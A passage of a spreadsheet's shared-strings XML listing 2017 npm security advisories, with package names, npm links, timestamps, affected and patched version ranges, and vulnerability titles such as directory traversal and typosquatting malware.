    <t>https://www.npmjs.com/dasafio</t>
  </si>
  <si>
    <t>/advisories/461</t>
  </si>
  <si>
    <t>2017-10-02T21:22:31.414+00:00</t>
  </si>
  <si>
    <t>intsol-package</t>
  </si>
  <si>
    <t>https://www.npmjs.com/intsol-package</t>
  </si>
  <si>
    <t>/advisories/462</t>
  </si>
  <si>
    <t>2017-10-02T21:22:17.689+00:00</t>
  </si>
  <si>
    <t>chatbyvista</t>
  </si>
  <si>
    <t>https://www.npmjs.com/chatbyvista</t>
  </si>
  <si>
    <t>/advisories/464</t>
  </si>
  <si>
    <t>2017-10-02T21:22:06.493+00:00</t>
  </si>
  <si>
    <t>jansenstuffpleasework</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jansenstuffpleasework</t>
  </si>
  <si>
    <t>/advisories/465</t>
  </si>
  <si>
    <t>2017-10-02T21:21:57.812+00:00</t>
  </si>
  <si>
    <t>ewgaddis.lab6</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ewgaddis.lab6</t>
  </si>
  <si>
    <t>/advisories/466</t>
  </si>
  <si>
    <t>2017-10-02T21:21:48.9+00:00</t>
  </si>
  <si>
    <t>whispercast</t>
  </si>
  <si>
    <t>https://www.npmjs.com/whispercast</t>
  </si>
  <si>
    <t>/advisories/467</t>
  </si>
  <si>
    <t>2017-10-02T21:21:39.562+00:00</t>
  </si>
  <si>
    <t>utahcityfinder</t>
  </si>
  <si>
    <t>https://www.npmjs.com/utahcityfinder</t>
  </si>
  <si>
    <t>/advisories/468</t>
  </si>
  <si>
    <t>2017-10-02T21:21:24.536+00:00</t>
  </si>
  <si>
    <t>section2.madisonjbrooks12</t>
  </si>
  <si>
    <t>https://www.npmjs.com/section2.madisonjbrooks12</t>
  </si>
  <si>
    <t>/advisories/414</t>
  </si>
  <si>
    <t>2017-09-29T18:54:13.764+00:00</t>
  </si>
  <si>
    <t>hcbserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/hcbserver</t>
  </si>
  <si>
    <t>/advisories/413</t>
  </si>
  <si>
    <t>2017-09-29T18:54:00.664+00:00</t>
  </si>
  <si>
    <t>liuyaserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/liuyaserver</t>
  </si>
  <si>
    <t>/advisories/412</t>
  </si>
  <si>
    <t>2017-09-29T18:53:25.253+00:00</t>
  </si>
  <si>
    <t>looppake</t>
  </si>
  <si>
    <t>https://www.npmjs.com/looppake</t>
  </si>
  <si>
    <t>/advisories/407</t>
  </si>
  <si>
    <t>2017-09-29T18:53:11.557+00:00</t>
  </si>
  <si>
    <t>wffserve</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wffserve</t>
  </si>
  <si>
    <t>/advisories/400</t>
  </si>
  <si>
    <t>2017-09-29T18:52:58.303+00:00</t>
  </si>
  <si>
    <t>yyooopack</t>
  </si>
  <si>
    <t>https://www.npmjs.com/yyooopack</t>
  </si>
  <si>
    <t>/advisories/399</t>
  </si>
  <si>
    <t>2017-09-29T18:52:28.417+00:00</t>
  </si>
  <si>
    <t>byucslabsix</t>
  </si>
  <si>
    <t>https://www.npmjs.com/byucslabsix</t>
  </si>
  <si>
    <t>/advisories/398</t>
  </si>
  <si>
    <t>2017-09-29T18:52:14.049+00:00</t>
  </si>
  <si>
    <t>calmquist.static-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/calmquist.static-server</t>
  </si>
  <si>
    <t>/advisories/397</t>
  </si>
  <si>
    <t>2017-09-29T18:51:55.877+00:00</t>
  </si>
  <si>
    <t>desafio</t>
  </si>
  <si>
    <t>https://www.npmjs.com/desafio</t>
  </si>
  <si>
    <t>/advisories/396</t>
  </si>
  <si>
    <t>2017-09-29T18:51:39.803+00:00</t>
  </si>
  <si>
    <t>dylmomo</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dylmomo</t>
  </si>
  <si>
    <t>/advisories/390</t>
  </si>
  <si>
    <t>2017-09-29T18:51:25.69+00:00</t>
  </si>
  <si>
    <t>22lixian</t>
  </si>
  <si>
    <t>https://www.npmjs.com/22lixian</t>
  </si>
  <si>
    <t>/advisories/389</t>
  </si>
  <si>
    <t>2017-09-28T17:00:49.315+00:00</t>
  </si>
  <si>
    <t>shenliru</t>
  </si>
  <si>
    <t>https://www.npmjs.com/shenliru</t>
  </si>
  <si>
    <t>/advisories/395</t>
  </si>
  <si>
    <t>2017-09-28T17:00:20.57+00:00</t>
  </si>
  <si>
    <t>11xiaoli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/11xiaoli</t>
  </si>
  <si>
    <t>/advisories/394</t>
  </si>
  <si>
    <t>2017-09-28T17:00:02.936+00:00</t>
  </si>
  <si>
    <t>caolilinode</t>
  </si>
  <si>
    <t>https://www.npmjs.com/caolilinode</t>
  </si>
  <si>
    <t>/advisories/393</t>
  </si>
  <si>
    <t>2017-09-28T16:59:44.535+00:00</t>
  </si>
  <si>
    <t>dcserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dcserver</t>
  </si>
  <si>
    <t>/advisories/392</t>
  </si>
  <si>
    <t>2017-09-28T16:59:24.741+00:00</t>
  </si>
  <si>
    <t>censorify.tanisjr</t>
  </si>
  <si>
    <t>https://www.npmjs.com/censorify.tanisjr</t>
  </si>
  <si>
    <t>/advisories/386</t>
  </si>
  <si>
    <t>2017-09-28T16:58:06.937+00:00</t>
  </si>
  <si>
    <t>myprolyz</t>
  </si>
  <si>
    <t>https://www.npmjs.com/myprolyz</t>
  </si>
  <si>
    <t>/advisories/383</t>
  </si>
  <si>
    <t>2017-09-28T16:57:52.545+00:00</t>
  </si>
  <si>
    <t>fast-http-cli</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fast-http-cli</t>
  </si>
  <si>
    <t>/advisories/380</t>
  </si>
  <si>
    <t>2017-09-28T16:57:02.457+00:00</t>
  </si>
  <si>
    <t>earlybird</t>
  </si>
  <si>
    <t>https://www.npmjs.com/earlybird</t>
  </si>
  <si>
    <t>/advisories/378</t>
  </si>
  <si>
    <t>2017-09-28T16:56:46.817+00:00</t>
  </si>
  <si>
    <t>gaoxuyan</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gaoxuyan</t>
  </si>
  <si>
    <t>/advisories/376</t>
  </si>
  <si>
    <t>2017-09-28T16:55:52.235+00:00</t>
  </si>
  <si>
    <t>static-html-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/static-html-server</t>
  </si>
  <si>
    <t>Chromium Remote Code Execution</t>
  </si>
  <si>
    <t>/advisories/539</t>
  </si>
  <si>
    <t>2017-09-28T15:50:14.31+00:00</t>
  </si>
  <si>
    <t>&lt; 1.6.14 || &gt;= 1.7.0 &lt; 1.7.8</t>
  </si>
  <si>
    <t>&gt;= 1.6.14 &lt; 1.7.0 ||  &gt;= 1.7.8</t>
  </si>
  <si>
    <t>/advisories/374</t>
  </si>
  <si>
    <t>2017-09-27T23:48:28.063+00:00</t>
  </si>
  <si>
    <t>wangguojing123</t>
  </si>
  <si>
    <t>https://www.npmjs.com/wangguojing123</t>
  </si>
  <si>
    <t>/advisories/372</t>
  </si>
  <si>
    <t>2017-09-27T23:45:07.553+00:00</t>
  </si>
  <si>
    <t>zwserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/zwserver</t>
  </si>
  <si>
    <t>/advisories/456</t>
  </si>
  <si>
    <t>2017-09-27T23:39:46.64+00:00</t>
  </si>
  <si>
    <t>serve46</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serve46</t>
  </si>
  <si>
    <t>/advisories/430</t>
  </si>
  <si>
    <t>2017-09-27T23:38:55.863+00:00</t>
  </si>
  <si>
    <t>shit-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/shit-server</t>
  </si>
  <si>
    <t>/advisories/445</t>
  </si>
  <si>
    <t>2017-09-27T23:37:36.352+00:00</t>
  </si>
  <si>
    <t>mockserve</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mockserve</t>
  </si>
  <si>
    <t>/advisories/463</t>
  </si>
  <si>
    <t>2017-09-27T23:37:03.615+00:00</t>
  </si>
  <si>
    <t>sspa</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sspa</t>
  </si>
  <si>
    <t>/advisories/469</t>
  </si>
  <si>
    <t>2017-09-27T23:36:35.878+00:00</t>
  </si>
  <si>
    <t>myserver.alexcthomas18</t>
  </si>
  <si>
    <t>https://www.npmjs.com/myserver.alexcthomas18</t>
  </si>
  <si>
    <t>/advisories/470</t>
  </si>
  <si>
    <t>2017-09-27T23:35:41.221+00:00</t>
  </si>
  <si>
    <t>commentapp.stetsonwood</t>
  </si>
  <si>
    <t>https://www.npmjs.com/commentapp.stetsonwood</t>
  </si>
  <si>
    <t>/advisories/471</t>
  </si>
  <si>
    <t>2017-09-27T23:35:02.706+00:00</t>
  </si>
  <si>
    <t>infraserver</t>
  </si>
  <si>
    <t>https://www.npmjs.com/infraserver</t>
  </si>
  <si>
    <t>/advisories/474</t>
  </si>
  <si>
    <t>2017-09-27T23:34:08.394+00:00</t>
  </si>
  <si>
    <t>lab6drewfusbyu</t>
  </si>
  <si>
    <t>https://www.npmjs.com/lab6drewfusbyu</t>
  </si>
  <si>
    <t>/advisories/475</t>
  </si>
  <si>
    <t>2017-09-27T23:33:23.256+00:00</t>
  </si>
  <si>
    <t>lab6.brit95</t>
  </si>
  <si>
    <t>https://www.npmjs.com/lab6.brit95</t>
  </si>
  <si>
    <t>/advisories/476</t>
  </si>
  <si>
    <t>2017-09-27T23:32:55.938+00:00</t>
  </si>
  <si>
    <t>jikes</t>
  </si>
  <si>
    <t>https://www.npmjs.com/jikes</t>
  </si>
  <si>
    <t>/advisories/535</t>
  </si>
  <si>
    <t>2017-09-27T18:25:14.672+00:00</t>
  </si>
  <si>
    <t>mime</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mime</t>
  </si>
  <si>
    <t>&lt; 1.4.1 || &gt; 2.0.0 &lt; 2.0.3</t>
  </si>
  <si>
    <t>&gt;= 1.4.1 &lt; 2.0.0 || &gt;= 2.0.3</t>
  </si>
  <si>
    <t>/advisories/534</t>
  </si>
  <si>
    <t>2017-09-27T18:24:24.49+00:00</t>
  </si>
  <si>
    <t>debug</t>
  </si>
  <si>
    <t>https://www.npmjs.com/debug</t>
  </si>
  <si>
    <t>&lt;= 2.6.8 || &gt;= 3.0.0 &lt;= 3.0.1</t>
  </si>
  <si>
    <t>&gt;= 2.6.9 &lt; 3.0.0 || &gt;= 3.1.0</t>
  </si>
  <si>
    <t>/advisories/538</t>
  </si>
  <si>
    <t>2017-09-27T18:22:26.253+00:00</t>
  </si>
  <si>
    <t>method-override</t>
  </si>
  <si>
    <t>https://www.npmjs.com/method-override</t>
  </si>
  <si>
    <t>&lt;= 1.0.2 || &gt; 2.0.0 &lt; 2.3.10</t>
  </si>
  <si>
    <t>&gt; 1.0.2 &lt; 2.0.0 || &gt;= 2.3.10</t>
  </si>
  <si>
    <t>/advisories/431</t>
  </si>
  <si>
    <t>2017-09-26T23:55:41.286+00:00</t>
  </si>
  <si>
    <t>serverzyy</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverzyy</t>
  </si>
  <si>
    <t>/advisories/472</t>
  </si>
  <si>
    <t>2017-09-26T23:54:54.544+00:00</t>
  </si>
  <si>
    <t>http_static_simple</t>
  </si>
  <si>
    <t>https://www.npmjs.com/http_static_simple</t>
  </si>
  <si>
    <t>/advisories/473</t>
  </si>
  <si>
    <t>2017-09-26T23:50:51.322+00:00</t>
  </si>
  <si>
    <t>goserv</t>
  </si>
  <si>
    <t>https://www.npmjs.com/goserv</t>
  </si>
  <si>
    <t>/advisories/452</t>
  </si>
  <si>
    <t>2017-09-26T23:49:59.206+00:00</t>
  </si>
  <si>
    <t>simple-npm-registry</t>
  </si>
  <si>
    <t>https://www.npmjs.com/simple-npm-registry</t>
  </si>
  <si>
    <t>/advisories/477</t>
  </si>
  <si>
    <t>2017-09-26T23:47:37.296+00:00</t>
  </si>
  <si>
    <t>unicorn-list</t>
  </si>
  <si>
    <t>https://www.npmjs.com/unicorn-list</t>
  </si>
  <si>
    <t>/advisories/478</t>
  </si>
  <si>
    <t>2017-09-26T23:43:57.175+00:00</t>
  </si>
  <si>
    <t>exxxxxxxxxxx</t>
  </si>
  <si>
    <t>https://www.npmjs.com/exxxxxxxxxxx</t>
  </si>
  <si>
    <t>Large gzip Denial of Service</t>
  </si>
  <si>
    <t>/advisories/479</t>
  </si>
  <si>
    <t>2017-09-26T23:42:10.322+00:00</t>
  </si>
  <si>
    <t>superagent</t>
  </si>
  <si>
    <t>https://www.npmjs.com/superagent</t>
  </si>
  <si>
    <t>&lt;3.7.0</t>
  </si>
  <si>
    <t>&gt;=3.7.0</t>
  </si>
  <si>
    <t>/advisories/481</t>
  </si>
  <si>
    <t>2017-09-26T23:32:05.745+00:00</t>
  </si>
  <si>
    <t>npm-script-demo</t>
  </si>
  <si>
    <t>https://www.npmjs.com/npm-script-demo</t>
  </si>
  <si>
    <t>Infecting Module</t>
  </si>
  <si>
    <t>/advisories/482</t>
  </si>
  <si>
    <t>2017-09-26T23:28:11.425+00:00</t>
  </si>
  <si>
    <t>pandora-doomsday</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pandora-doomsday</t>
  </si>
  <si>
    <t>Tracking Module</t>
  </si>
  <si>
    <t>/advisories/483</t>
  </si>
  <si>
    <t>2017-09-26T23:25:43.984+00:00</t>
  </si>
  <si>
    <t>botbait</t>
  </si>
  <si>
    <t>https://www.npmjs.com/botbait</t>
  </si>
  <si>
    <t>/advisories/385</t>
  </si>
  <si>
    <t>2017-09-26T18:57:06.911+00:00</t>
  </si>
  <si>
    <t>rtcmulticonnection-client</t>
  </si>
  <si>
    <t>https://www.npmjs.com/rtcmulticonnection-client</t>
  </si>
  <si>
    <t>/advisories/382</t>
  </si>
  <si>
    <t>2017-09-26T18:56:23.097+00:00</t>
  </si>
  <si>
    <t>node-server-forfront</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-server-forfront</t>
  </si>
  <si>
    <t>/advisories/388</t>
  </si>
  <si>
    <t>2017-09-26T16:30:07.365+00:00</t>
  </si>
  <si>
    <t>welcomyzt</t>
  </si>
  <si>
    <t>https://www.npmjs.com/welcomyzt</t>
  </si>
  <si>
    <t>/advisories/381</t>
  </si>
  <si>
    <t>2017-09-26T16:29:54.75+00:00</t>
  </si>
  <si>
    <t>cuciuci</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cuciuci</t>
  </si>
  <si>
    <t>/advisories/391</t>
  </si>
  <si>
    <t>2017-09-26T16:29:43.427+00:00</t>
  </si>
  <si>
    <t>datachannel-client</t>
  </si>
  <si>
    <t>https://www.npmjs.com/datachannel-client</t>
  </si>
  <si>
    <t>/advisories/387</t>
  </si>
  <si>
    <t>2017-09-26T16:29:29.324+00:00</t>
  </si>
  <si>
    <t>liyujing</t>
  </si>
  <si>
    <t>https://www.npmjs.com/liyujing</t>
  </si>
  <si>
    <t>/advisories/526</t>
  </si>
  <si>
    <t>2017-09-26T16:06:50.827+00:00</t>
  </si>
  <si>
    <t>fresh</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fresh</t>
  </si>
  <si>
    <t>&lt; 0.5.2</t>
  </si>
  <si>
    <t>&gt;= 0.5.2</t>
  </si>
  <si>
    <t>/advisories/527</t>
  </si>
  <si>
    <t>2017-09-26T16:03:33.583+00:00</t>
  </si>
  <si>
    <t>forwarded</t>
  </si>
  <si>
    <t>https://www.npmjs.com/forwarded</t>
  </si>
  <si>
    <t>&lt; 0.1.2</t>
  </si>
  <si>
    <t>&gt;= 0.1.2</t>
  </si>
  <si>
    <t>/advisories/537</t>
  </si>
  <si>
    <t>2017-09-25T19:20:56.983+00:00</t>
  </si>
  <si>
    <t>slug</t>
  </si>
  <si>
    <t>https://www.npmjs.com/slug</t>
  </si>
  <si>
    <t>/advisories/536</t>
  </si>
  <si>
    <t>2017-09-25T19:16:01.33+00:00</t>
  </si>
  <si>
    <t>string</t>
  </si>
  <si>
    <t>https://www.npmjs.com/string</t>
  </si>
  <si>
    <t>/advisories/533</t>
  </si>
  <si>
    <t>2017-09-25T19:11:21.202+00:00</t>
  </si>
  <si>
    <t>timespan</t>
  </si>
  <si>
    <t>https://www.npmjs.com/timespan</t>
  </si>
  <si>
    <t>/advisories/531</t>
  </si>
  <si>
    <t>2017-09-21T20:41:26.47+00:00</t>
  </si>
  <si>
    <t>marked</t>
  </si>
  <si>
    <t>https://www.npmjs.com/marked</t>
  </si>
  <si>
    <t>&lt;0.3.9</t>
  </si>
  <si>
    <t>&gt;=0.3.9</t>
  </si>
  <si>
    <t>/advisories/528</t>
  </si>
  <si>
    <t>2017-09-21T04:16:33.512+00:00</t>
  </si>
  <si>
    <t>parsejson</t>
  </si>
  <si>
    <t>https://www.npmjs.com/parsejson</t>
  </si>
  <si>
    <t>&lt;=0.0.3</t>
  </si>
  <si>
    <t>/advisories/525</t>
  </si>
  <si>
    <t>2017-09-21T04:01:51.361+00:00</t>
  </si>
  <si>
    <t>tough-cookie</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tough-cookie</t>
  </si>
  <si>
    <t>&lt;2.3.3</t>
  </si>
  <si>
    <t>&gt;=2.3.3</t>
  </si>
  <si>
    <t>/advisories/530</t>
  </si>
  <si>
    <t>2017-09-12T21:49:15.718+00:00</t>
  </si>
  <si>
    <t>content</t>
  </si>
  <si>
    <t>https://www.npmjs.com/content</t>
  </si>
  <si>
    <t>&lt;=3.0.5</t>
  </si>
  <si>
    <t>&gt;=3.0.6</t>
  </si>
  <si>
    <t>/advisories/379</t>
  </si>
  <si>
    <t>2017-09-12T02:41:03.6+00:00</t>
  </si>
  <si>
    <t>weather.swlyons</t>
  </si>
  <si>
    <t>https://www.npmjs.com/weather.swlyons</t>
  </si>
  <si>
    <t>/advisories/373</t>
  </si>
  <si>
    <t>2017-09-12T02:40:54.423+00:00</t>
  </si>
  <si>
    <t>easyquick</t>
  </si>
  <si>
    <t>https://www.npmjs.com/easyquick</t>
  </si>
  <si>
    <t>/advisories/377</t>
  </si>
  <si>
    <t>2017-09-12T02:40:45.904+00:00</t>
  </si>
  <si>
    <t>gaoxiaotingtingting</t>
  </si>
  <si>
    <t>https://www.npmjs.com/gaoxiaotingtingting</t>
  </si>
  <si>
    <t>Directory traversal</t>
  </si>
  <si>
    <t>/advisories/341</t>
  </si>
  <si>
    <t>2017-09-12T02:40:33.491+00:00</t>
  </si>
  <si>
    <t>pooledwebsocket</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pooledwebsocket</t>
  </si>
  <si>
    <t>&gt;=0.0.1 &lt;=0.0.18</t>
  </si>
  <si>
    <t>&gt;=0.0.19</t>
  </si>
  <si>
    <t>/advisories/375</t>
  </si>
  <si>
    <t>2017-09-12T02:39:47.124+00:00</t>
  </si>
  <si>
    <t>tmock</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tmock</t>
  </si>
  <si>
    <t>/advisories/363</t>
  </si>
  <si>
    <t>2017-09-12T02:39:22.674+00:00</t>
  </si>
  <si>
    <t>serverwzl</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverwzl</t>
  </si>
  <si>
    <t>&lt;99.999.9999</t>
  </si>
  <si>
    <t>/advisories/370</t>
  </si>
  <si>
    <t>2017-09-12T02:39:14.557+00:00</t>
  </si>
  <si>
    <t>citypredict.whauwiller</t>
  </si>
  <si>
    <t>https://www.npmjs.com/citypredict.whauwiller</t>
  </si>
  <si>
    <t>/advisories/354</t>
  </si>
  <si>
    <t>2017-09-12T02:39:03.793+00:00</t>
  </si>
  <si>
    <t>serveryztyzt</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serveryztyzt</t>
  </si>
  <si>
    <t>/advisories/366</t>
  </si>
  <si>
    <t>2017-09-12T02:38:51.866+00:00</t>
  </si>
  <si>
    <t>serverhuwenhui</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverhuwenhui</t>
  </si>
  <si>
    <t>/advisories/364</t>
  </si>
  <si>
    <t>2017-09-08T21:28:39.066+00:00</t>
  </si>
  <si>
    <t>serverwg</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverwg</t>
  </si>
  <si>
    <t>Command Injection</t>
  </si>
  <si>
    <t>/advisories/523</t>
  </si>
  <si>
    <t>2017-09-08T21:02:06.82+00:00</t>
  </si>
  <si>
    <t>dns-sync</t>
  </si>
  <si>
    <t>https://www.npmjs.com/dns-sync</t>
  </si>
  <si>
    <t>/advisories/529</t>
  </si>
  <si>
    <t>2017-09-08T20:49:27.619+00:00</t>
  </si>
  <si>
    <t>no-case</t>
  </si>
  <si>
    <t>https://www.npmjs.com/no-case</t>
  </si>
  <si>
    <t>&lt;2.3.2</t>
  </si>
  <si>
    <t>&gt;=2.3.2</t>
  </si>
  <si>
    <t>/advisories/524</t>
  </si>
  <si>
    <t>2017-09-08T17:57:17.567+00:00</t>
  </si>
  <si>
    <t>charset</t>
  </si>
  <si>
    <t>https://www.npmjs.com/charset</t>
  </si>
  <si>
    <t>&lt;1.0.0</t>
  </si>
  <si>
    <t>/advisories/342</t>
  </si>
  <si>
    <t>2017-09-06T19:11:21.694+00:00</t>
  </si>
  <si>
    <t>tiny-http</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tiny-http</t>
  </si>
  <si>
    <t>/advisories/355</t>
  </si>
  <si>
    <t>2017-09-06T19:11:00.461+00:00</t>
  </si>
  <si>
    <t>serveryaozeyan</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serveryaozeyan</t>
  </si>
  <si>
    <t>/advisories/367</t>
  </si>
  <si>
    <t>2017-09-06T19:10:45.124+00:00</t>
  </si>
  <si>
    <t>serverliujiayi1</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverliujiayi1</t>
  </si>
  <si>
    <t>/advisories/343</t>
  </si>
  <si>
    <t>2017-09-06T19:10:32.286+00:00</t>
  </si>
  <si>
    <t>iter-http</t>
  </si>
  <si>
    <t>https://www.npmjs.com/iter-http</t>
  </si>
  <si>
    <t>/advisories/347</t>
  </si>
  <si>
    <t>2017-09-06T19:10:24.229+00:00</t>
  </si>
  <si>
    <t>cyber-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cyber-js</t>
  </si>
  <si>
    <t>/advisories/340</t>
  </si>
  <si>
    <t>2017-09-01T16:53:06.324+00:00</t>
  </si>
  <si>
    <t>sencisho</t>
  </si>
  <si>
    <t>https://www.npmjs.com/sencisho</t>
  </si>
  <si>
    <t>/advisories/339</t>
  </si>
  <si>
    <t>2017-09-01T16:52:48.816+00:00</t>
  </si>
  <si>
    <t>xtalk</t>
  </si>
  <si>
    <t>https://www.npmjs.com/xtalk</t>
  </si>
  <si>
    <t>&gt;=0.0.2</t>
  </si>
  <si>
    <t>/advisories/345</t>
  </si>
  <si>
    <t>2017-09-01T16:52:38.988+00:00</t>
  </si>
  <si>
    <t>fsk-server</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fsk-server</t>
  </si>
  <si>
    <t>/advisories/365</t>
  </si>
  <si>
    <t>2017-08-30T16:04:39.3+00:00</t>
  </si>
  <si>
    <t>serverlyr</t>
  </si>
  <si>
    <t>https://www.npmjs.com/serverlyr</t>
  </si>
  <si>
    <t>Sandbox Breakout</t>
  </si>
  <si>
    <t>/advisories/337</t>
  </si>
  <si>
    <t>2017-08-30T15:56:22.867+00:00</t>
  </si>
  <si>
    <t>safe-eval</t>
  </si>
  <si>
    <t>https://www.npmjs.com/safe-eval</t>
  </si>
  <si>
    <t>/advisories/360</t>
  </si>
  <si>
    <t>2017-08-29T16:47:06.975+00:00</t>
  </si>
  <si>
    <t>fs-git</t>
  </si>
  <si>
    <t>https://www.npmjs.com/fs-git</t>
  </si>
  <si>
    <t>&lt;=1.0.1</t>
  </si>
  <si>
    <t>ReDoS via long UserAgent header</t>
  </si>
  <si>
    <t>/advisories/316</t>
  </si>
  <si>
    <t>2017-08-29T16:44:27.805+00:00</t>
  </si>
  <si>
    <t>ua-parser</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ua-parser</t>
  </si>
  <si>
    <t>/advisories/371</t>
  </si>
  <si>
    <t>2017-08-29T16:38:00.615+00:00</t>
  </si>
  <si>
    <t>tinyserver2</t>
  </si>
  <si>
    <t>https://www.npmjs.com/tinyserver2</t>
  </si>
  <si>
    <t>&lt;=0.5.2</t>
  </si>
  <si>
    <t>/advisories/344</t>
  </si>
  <si>
    <t>2017-08-29T16:37:44.872+00:00</t>
  </si>
  <si>
    <t>list-n-stream</t>
  </si>
  <si>
    <t>https://www.npmjs.com/list-n-stream</t>
  </si>
  <si>
    <t>&lt;=0.0.10</t>
  </si>
  <si>
    <t>&gt;=0.0.11</t>
  </si>
  <si>
    <t>/advisories/352</t>
  </si>
  <si>
    <t>2017-08-29T16:19:57.011+00:00</t>
  </si>
  <si>
    <t>node-simple-router</t>
  </si>
  <si>
    <t>https://www.npmjs.com/node-simple-router</t>
  </si>
  <si>
    <t>&lt;=0.10.0</t>
  </si>
  <si>
    <t>&gt;=0.10.1</t>
  </si>
  <si>
    <t>/advisories/521</t>
  </si>
  <si>
    <t>2017-08-13T04:34:53.158+00:00</t>
  </si>
  <si>
    <t>pg</t>
  </si>
  <si>
    <t>https://www.npmjs.com/pg</t>
  </si>
  <si>
    <t>&lt; 2.11.2 || &gt;= 3.0.0 &lt; 3.6.4 ||  &gt;= 4.0.0 &lt; 4.5.7 || &gt;= 5.0.0 &lt; 5.2.1 || &gt;= 6.0.0 &lt; 6.0.5 || &gt;= 6.1.0 &lt; 6.1.6 || &gt;= 6.2.0 &lt; 6.2.5 || &gt;= 6.3.0 &lt; 6.3.3 || &gt;= 6.4.0 &lt; 6.4.2 || &gt;= 7.0.0 &lt; 7.0.2 || &gt;= 7.1.0 &lt; 7.1.2</t>
  </si>
  <si>
    <t>&gt;= 2.11.2 &lt; 3.0.0|| &gt;= 3.6.4 &lt; 4.0.0 ||  &gt;= 4.5.7 &lt; 5.0.0 || &gt;= 5.2.1 &lt; 6.0.0 || &gt;= 6.0.5  &lt; 6.1.0 || &gt;= 6.1.6 &lt; 6.2.0 || &gt;= 6.2.5 &lt; 6.3.0 || &gt;= 6.3.3 &lt; 6.4.0 || &gt;= 6.4.2 &lt; 7.0.0 || &gt;= 7.0.2 &lt; 7.1.0 || &gt;= 7.1.2</t>
  </si>
  <si>
    <t>Hijacked Environment Variables</t>
  </si>
  <si>
    <t>/advisories/520</t>
  </si>
  <si>
    <t>2017-08-09T00:00:48.549+00:00</t>
  </si>
  <si>
    <t>cross-env.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/cross-env.js</t>
  </si>
  <si>
    <t>/advisories/519</t>
  </si>
  <si>
    <t>2017-08-08T23:59:49.845+00:00</t>
  </si>
  <si>
    <t>nodesass</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodesass</t>
  </si>
  <si>
    <t>/advisories/518</t>
  </si>
  <si>
    <t>2017-08-08T23:59:14.624+00:00</t>
  </si>
  <si>
    <t>smb</t>
  </si>
  <si>
    <t>https://www.npmjs.com/smb</t>
  </si>
  <si>
    <t>/advisories/517</t>
  </si>
  <si>
    <t>2017-08-08T23:58:44.451+00:00</t>
  </si>
  <si>
    <t>shadowsock</t>
  </si>
  <si>
    <t>https://www.npmjs.com/shadowsock</t>
  </si>
  <si>
    <t>/advisories/516</t>
  </si>
  <si>
    <t>2017-08-08T23:58:13.425+00:00</t>
  </si>
  <si>
    <t>mongose</t>
  </si>
  <si>
    <t>https://www.npmjs.com/mongose</t>
  </si>
  <si>
    <t>/advisories/515</t>
  </si>
  <si>
    <t>2017-08-08T23:57:41.725+00:00</t>
  </si>
  <si>
    <t>proxy.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/proxy.js</t>
  </si>
  <si>
    <t>/advisories/514</t>
  </si>
  <si>
    <t>2017-08-08T23:56:45.167+00:00</t>
  </si>
  <si>
    <t>http-proxy.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/http-proxy.js</t>
  </si>
  <si>
    <t>/advisories/513</t>
  </si>
  <si>
    <t>2017-08-08T23:46:35.236+00:00</t>
  </si>
  <si>
    <t>crossenv</t>
  </si>
  <si>
    <t>https://www.npmjs.com/crossenv</t>
  </si>
  <si>
    <t>/advisories/512</t>
  </si>
  <si>
    <t>2017-08-08T23:41:13.196+00:00</t>
  </si>
  <si>
    <t>noderequest</t>
  </si>
  <si>
    <t>https://www.npmjs.com/noderequest</t>
  </si>
  <si>
    <t>/advisories/511</t>
  </si>
  <si>
    <t>2017-08-08T23:40:34.43+00:00</t>
  </si>
  <si>
    <t>nodemailer.js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodemailer.js</t>
  </si>
  <si>
    <t>/advisories/510</t>
  </si>
  <si>
    <t>2017-08-08T23:35:08.639+00:00</t>
  </si>
  <si>
    <t>nodemailer-js</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodemailer-js</t>
  </si>
  <si>
    <t>/advisories/509</t>
  </si>
  <si>
    <t>2017-08-08T23:34:26.247+00:00</t>
  </si>
  <si>
    <t>nodecaffe</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodecaffe</t>
  </si>
  <si>
    <t>/advisories/508</t>
  </si>
  <si>
    <t>2017-08-08T22:54:23.993+00:00</t>
  </si>
  <si>
    <t>nodeffmpeg</t>
  </si>
  <si>
    <t>https://www.npmjs.com/nodeffmpeg</t>
  </si>
  <si>
    <t>/advisories/507</t>
  </si>
  <si>
    <t>2017-08-08T22:53:48.751+00:00</t>
  </si>
  <si>
    <t>ffmepg</t>
  </si>
  <si>
    <t>https://www.npmjs.com/ffmepg</t>
  </si>
  <si>
